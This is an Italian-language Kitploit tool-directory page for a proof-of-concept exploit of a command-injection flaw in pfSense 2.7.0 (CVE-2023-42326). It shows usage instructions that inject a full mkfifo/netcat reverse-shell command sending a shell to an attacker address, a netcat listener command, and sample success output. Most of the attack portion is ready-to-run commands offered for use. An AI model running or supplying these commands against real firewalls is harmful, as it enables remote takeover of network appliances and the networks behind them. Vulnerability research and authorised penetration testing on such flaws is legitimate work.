Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2023-42326 — Questa è una semplice POC per mostrare la vulnerabilità di iniezione di comandi in pfsense 2.7 (CVE-2023-42326) | Kitploit
Strumenti/GitHubGitHub/bl4ckarch/cve-2023-42326
Generazione di PayloadAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingCommand and Control
GitHubbl4ckarch/cve-2023-42326

CVE-2023-42326

Questa è una semplice POC per mostrare la vulnerabilità di iniezione di comandi in pfsense 2.7 (CVE-2023-42326)

Vedi Repository
41 anno faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

pfSense 2.7.0 Exploit di Iniezione di Comandi (CVE-2023-42326)

Questo script Python è un exploit Proof-of-Concept (PoC) per la vulnerabilità di iniezione di comandi (CVE-2023-42326) in pfSense 2.7.0. La vulnerabilità consente ad attaccanti autenticati di iniettare ed eseguire comandi arbitrari tramite i componenti interfaces_gif_edit.php e interfaces_gre_edit.php.

Caratteristiche

  • Selezione della modalità di exploit (gif o gre) per scegliere i componenti vulnerabili.
  • Capacità di iniezione di comandi per eseguire comandi shell arbitrari.
  • Gestione della reverse shell Netcat con gestione automatica dei thread.
  • Modalità debug per una migliore visibilità dei dati delle richieste.

Prerequisiti

Prima di eseguire lo script, assicurati di avere:

  • Python 3.x installato sul tuo sistema.
  • Librerie Python richieste installate:
    root@kitploit:~
    pip install requests beautifulsoup4 rich
    

Utilizzo

Esempio Base (Iniezione di Comandi)

Questo comando inietta un comando shell che crea una reverse shell verso la tua macchina:

root@kitploit:~
python3 exploit.py -u "admin" -p "pfsense" --mode "gif" -t "http://10.101.1.1" -c "rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc 192.168.151.1 80 > /tmp/f &"
  • -u: Nome utente per l'accesso admin di pfSense.
  • -p: Password per l'accesso admin di pfSense.
  • --mode: Modalità di exploit (gif o gre).
  • -t: URL di destinazione di pfSense.
  • -c: Il comando shell da iniettare.
  • -d: (Opzionale) Abilita la modalità debug per vedere i dati grezzi delle risposte.

Esempio di Reverse Shell

Assicurati di avere un listener Netcat in esecuzione sulla tua macchina:

root@kitploit:~
nc -lvnp 80

Quindi, esegui lo script con un comando di reverse shell come questo:

root@kitploit:~
python3 exploit.py -u "admin" -p "pfsense" --mode "gif" -t "http://10.101.1.1" -c "rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc 192.168.151.1 80 > /tmp/f &"  --insecure(for https without valid ssl)

GIF Dimostrative

  1. Accesso a pfSense e sfruttamento dell'interfaccia GIF

    Demo 1 - GIF Interface

  2. Esecuzione di una Reverse Shell

    Demo 2 - Reverse Shell

Opzioni dello Script

Esempio di Output

Quando l'exploit viene eseguito con successo, dovresti vedere un output simile a questo:

root@kitploit:~
██████╗ ███████╗██████╗ ██╗    ██╗███╗   ██╗███╗   ███╗███████╗
██╔══██╗██╔════╝██╔══██╗██║    ██║████╗  ██║████╗ ████║██╔════╝
██████╔╝█████╗  ██████╔╝██║ █╗ ██║██╔██╗ ██║██╔████╔██║█████╗  
██╔═══╝ ██╔══╝  ██╔═══╝ ██║███╗██║██║╚██╗██║██║╚██╔╝██║██╔══╝  
██║     ██║     ██║     ╚███╔███╔╝██║ ╚████║██║ ╚═╝ ██║███████╗
╚═╝     ╚═╝     ╚═╝      ╚══╝╚══╝ ╚═╝  ╚═══╝╚═╝     ╚═╝╚══════╝

Done with ❤️  by @bl4ckarch                                                            
[2024-10-24 03:57:59] [SUCCESS] Target http://10.101.1.1 is reachable
[2024-10-24 03:57:59] [INFO] Fetching CSRF token from: http://10.101.1.1/
[2024-10-24 03:57:59] [SUCCESS] CSRF token extracted successfully
[2024-10-24 03:57:59] [INFO] Sending GIF exploit request to http://10.101.1.1/interfaces_gif_edit.php
[2024-10-24 03:57:59] [SUCCESS] GIF Exploit sent successfully

Note

  • Requisito di privilegio: Devi avere credenziali admin valide per l'istanza pfSense.
  • Sistema target: Questo exploit è specifico per pfSense 2.7.0.
  • Reverse Shell: Assicurati che le impostazioni del firewall consentano connessioni in entrata sulla porta specificata quando si imposta una reverse shell.

Modalità Debug

Se vuoi vedere più dettagli sulle richieste inviate, puoi abilitare la modalità debug aggiungendo -d al tuo comando. Questo stamperà i dati delle risposte e ti aiuterà a diagnosticare eventuali problemi.

root@kitploit:~
python3 exploit.py -u "admin" -p 'pfsense' --mode 'gif' -t http://10.101.1.1 -c "your_command_here" -d --insecure(for https without valid ssl)

Risoluzione dei Problemi

  • Assicurati che il sistema target sia raggiungibile.
  • Ricontrolla le credenziali utilizzate per l'accesso.
  • Usa il flag -d per una registrazione più dettagliata se necessario.
Scarica lo strumento
ArgomentoDescrizione
-uNome utente per l'accesso admin di pfSense.
-pPassword per l'accesso admin di pfSense.
-tURL/indirizzo IP di destinazione pfSense (es., http://10.101.1.1).
--modeModalità di exploit: gif (per interfaces_gif_edit.php) o gre.
-cComando da iniettare nel componente vulnerabile.
-dOpzionale. Abilita la modalità debug per stampare i dati delle risposte per visibilità.